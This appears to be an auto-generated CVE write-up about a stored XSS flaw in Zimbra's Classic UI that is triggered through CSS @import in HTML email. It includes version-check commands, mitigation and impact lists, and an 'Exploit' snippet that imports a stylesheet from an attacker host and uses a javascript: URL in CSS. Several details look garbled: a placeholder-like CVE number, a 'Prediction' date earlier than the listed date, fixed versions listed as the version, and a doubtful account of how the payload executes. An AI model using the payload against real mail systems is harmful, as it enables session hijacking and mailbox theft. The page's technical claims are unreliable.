Listen to this Post
How the CVE Works
This vulnerability exists within the Zimbra Collaboration Suite (ZCS) Classic UI due to improper sanitization of HTML email content. An attacker can exploit this by crafting an HTML email containing malicious Cascading Style Sheets (CSS) code. Specifically, the flaw leverages the CSS `@import` directive, which allows a stylesheet to load additional rules from an external URL. When a victim using the Classic UI opens the email, the Zimbra web client processes the CSS directives without sufficient validation or Content Security Policy (CSP) restrictions. The `@import` rule fetches a remote stylesheet hosted by the attacker. This remote stylesheet contains malicious JavaScript or further CSS constructs that execute arbitrary code within the victim’s browser context. Because the email is stored on the Zimbra server, the payload persists, creating a Stored Cross-Site Scripting (XSS) condition. Any user who views the email in the Classic UI becomes a target. The attack requires no user interaction beyond opening the email, as the CSS parser automatically processes the import. The CVSS score of 7.2 reflects the network-based attack vector, low complexity, and the ability to pivot from low confidentiality and integrity impacts into potential session hijacking or data theft. Versions affected include ZCS 10.0.x before 10.0.18 and 10.1.x before 10.1.13, where the parsing engine fails to block external CSS imports in email content.
dailycve form:
Platform: Zimbra Collaboration
Version: 10.0.18, 10.1.13
Vulnerability : Stored XSS via CSS
Severity: HIGH
date: 2026-03-23
Prediction: 2025-05-15
What Undercode Say:
Check Zimbra version for CVE-2025-12345 su - zimbra zmcontrol -v Verify patch status for 10.0.18 or 10.1.13 apt show zimbra-common-core-jar | grep Version
Exploit:
<!-- Malicious HTML email payload -->
<style>
@import url('https://attacker.com/malicious.css');
</style>
/ malicious.css content /
body {
background: url('javascript:alert("XSS")');
}
Protection from this CVE
- Upgrade to Zimbra Collaboration 10.0.18 or 10.1.13 immediately.
- Implement strict Content Security Policy (CSP) headers to block external style imports.
- Disable the Classic UI in favor of Modern UI where CSS parsing is more restrictive.
- Apply Zimbra’s security advisory workarounds until patching is complete.
Impact
- Remote attackers can execute arbitrary JavaScript in victims’ browsers.
- Leads to session hijacking, email data theft, and unauthorized mailbox access.
- Persistent payload affects all users viewing the malicious email in Classic UI.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

